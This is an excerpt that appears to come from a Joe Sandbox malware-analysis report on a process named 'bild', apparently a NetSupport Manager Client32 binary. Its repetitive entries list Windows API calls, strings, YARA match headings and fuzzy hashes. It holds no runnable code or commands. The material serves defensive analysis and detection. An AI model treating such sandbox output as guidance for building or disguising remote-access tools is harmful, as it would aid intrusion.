                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                      • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                      • API String ID: 175691280-2052047905
                                                                                      • Opcode ID: 5efc2b1b499c19e22c0b11ea56c1799b84258173eef5baac531c406e2266982d
                                                                                      • Instruction ID: 2d49a6c718824c4fb39b7936eb355b27ab8e956fb5db8f47369f869790572c39
                                                                                      • Opcode Fuzzy Hash: 5efc2b1b499c19e22c0b11ea56c1799b84258173eef5baac531c406e2266982d
                                                                                      • Instruction Fuzzy Hash: 91F0F979B0021D6BCB01DFA4DC50BFEBBFC9B45208F044099EA04A7240DE706A05C7A5
                                                                                      APIs
                                                                                      • wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                      • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                      • API String ID: 175691280-2052047905
                                                                                      • Opcode ID: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                      • Instruction ID: 95fe0cd820de1796fd70713afb7a02e85a0165c228f84a05359d3cb2f5b90ec5
                                                                                      • Opcode Fuzzy Hash: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                      • Instruction Fuzzy Hash: 4FF0A47AA0025CBBCB00DEA5DD40BEEFBBD9B45248F044199E608A7140DE706A45C7A5
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                      • SetLastError.KERNEL32(00000078,00000000,?,1109E29C,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D42D
                                                                                      Strings
                                                                                      • ConvertStringSecurityDescriptorToSecurityDescriptorA, xrefs: 1109D3FE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastProc
                                                                                      • String ID: ConvertStringSecurityDescriptorToSecurityDescriptorA
                                                                                      • API String ID: 199729137-262600717
                                                                                      • Opcode ID: 72b6cad3dfc85a2363e3c34f7b358bf502283420fca47eee65f37d335c1a72b0
                                                                                      • Instruction ID: e717ac8c1df76163528922924e3c5170e1254239c9623c731bd739b822e2347b
                                                                                      • Opcode Fuzzy Hash: 72b6cad3dfc85a2363e3c34f7b358bf502283420fca47eee65f37d335c1a72b0
                                                                                      • Instruction Fuzzy Hash: C2F05E72A55228AFD724DFA4E844A97B7E8EB48720F00451AF95597240C670FC14DBA0
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • CreateThread.KERNEL32(00000000,00000000,11026ED0,00000000,00000000,00000000), ref: 110291BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateThread__wcstoi64
                                                                                      • String ID: *TapiFixPeriod$Bridge
                                                                                      • API String ID: 1152747075-2058455932
                                                                                      • Opcode ID: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                      • Instruction ID: bf80e38bc05b38b2fab7e3f27e0d367de778c9bee9065702c43ca09430eaf323
                                                                                      • Opcode Fuzzy Hash: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                      • Instruction Fuzzy Hash: 60F0E57074532D7EFB11DAD6CC45F79B6989300B08FA0003DF528551C8E6B1B9008766
                                                                                      APIs
                                                                                      • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
                                                                                      • m_hWnd, xrefs: 11001096
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 2046328329-2830328467
                                                                                      • Opcode ID: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                      • Instruction ID: 77f34a7b6d351dc7c2bdf78fd4e91b5ab9e9d0feae3f5383371c0572f9fc60e5
                                                                                      • Opcode Fuzzy Hash: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                      • Instruction Fuzzy Hash: 98E01ABA71025DBFD714CE95EC81EE7B3ACEB48364F008529FA2997640D6B0E85087A1
                                                                                      APIs
                                                                                      • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
                                                                                      • m_hWnd, xrefs: 11001056
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 819365019-2830328467
                                                                                      • Opcode ID: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                      • Instruction ID: cf35a841ff9db8a25d072bdd62e9da3c8eef3a8b3e547f8f1cf52fd96b7d4918
                                                                                      • Opcode Fuzzy Hash: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                      • Instruction Fuzzy Hash: 3CE04FB570021DABD310CA95DC85ED7B39CEB54354F008429F92887600D6B0F89087A0
                                                                                      APIs
                                                                                      • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
                                                                                      • m_hWnd, xrefs: 110010E6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 906220102-2830328467
                                                                                      • Opcode ID: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                      • Instruction ID: e326bc5325dc434b8864e09602644acab64ba33727794dfa8c4f249b36814fc9
                                                                                      • Opcode Fuzzy Hash: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                      • Instruction Fuzzy Hash: 81E04FB970025DAFD314CA95DC45ED6B3ACEB54764F008429F92887600DA70F84087A0
                                                                                      APIs
                                                                                      • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                      • m_hWnd, xrefs: 11001126
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 1604732272-2830328467
                                                                                      • Opcode ID: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                      • Instruction ID: 825df7ee52a795a689a6901b0494195ba864db9fe7d9b2cdbf909eadc0dc9b6b
                                                                                      • Opcode Fuzzy Hash: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                      • Instruction Fuzzy Hash: 4ED02BB561031CABC314DA92DC41FD2F38CAB20364F004435F52542500D571F54083A4
                                                                                      APIs
                                                                                      • KillTimer.USER32(?,?), ref: 1100102B
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                      • m_hWnd, xrefs: 11001016
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 2229609774-2830328467
                                                                                      • Opcode ID: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                      • Instruction ID: d507351e39c60ba8400a42a64aee1b3b281c2e630578985a984e8bb8925e1fd6
                                                                                      • Opcode Fuzzy Hash: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                      • Instruction Fuzzy Hash: 21D02B76B4031DABD310C691DC44FD2F39CD714364F008035F55446500D570F8408390
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strncpy
                                                                                      • String ID: 1000,50$1000,50
                                                                                      • API String ID: 2961919466-2776873633
                                                                                      • Opcode ID: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                      • Instruction ID: bd0c201b9adf6a5d857793fbf3440ac1f90bcd045974f847078f01ed738f2ada
                                                                                      • Opcode Fuzzy Hash: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                      • Instruction Fuzzy Hash: 7ED0A7706883996FE7008E69EC00B5DBBCC6B01E14F408021FC98CB780DB70F9508351
                                                                                      APIs
                                                                                      • SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                                      • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                                      • API String ID: 2400454052-4183089485
                                                                                      • Opcode ID: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                      • Instruction ID: 9b03986313e8994d60ed52ed66d1c026156e8c3194449c112131b18896cf505e
                                                                                      • Opcode Fuzzy Hash: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                      • Instruction Fuzzy Hash: EDD0223AE142369FD2A09BA8AC06FC2F3B49B08318F018438F00096080DAB0B445CB88
                                                                                      APIs
                                                                                      • GetWindowTextLengthA.USER32(00000000), ref: 11153524
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1115350E
                                                                                      • m_hWnd, xrefs: 11153513
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastLengthMessageProcessTextWindowwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 67735064-2830328467
                                                                                      • Opcode ID: fad9644258b9fcb2970ce22f50fed9297b46cc15e0ab03ded2db0d651ee77a36
                                                                                      • Instruction ID: 41066489dfbac7b1bedb0840a1a625780406ac6dbed52086b597086e3eac16ab
                                                                                      • Opcode Fuzzy Hash: fad9644258b9fcb2970ce22f50fed9297b46cc15e0ab03ded2db0d651ee77a36
                                                                                      • Instruction Fuzzy Hash: 5FD022B5B69229ABC31096A1EC84FC1B3849B0832CF011834F03553400E660B8C08341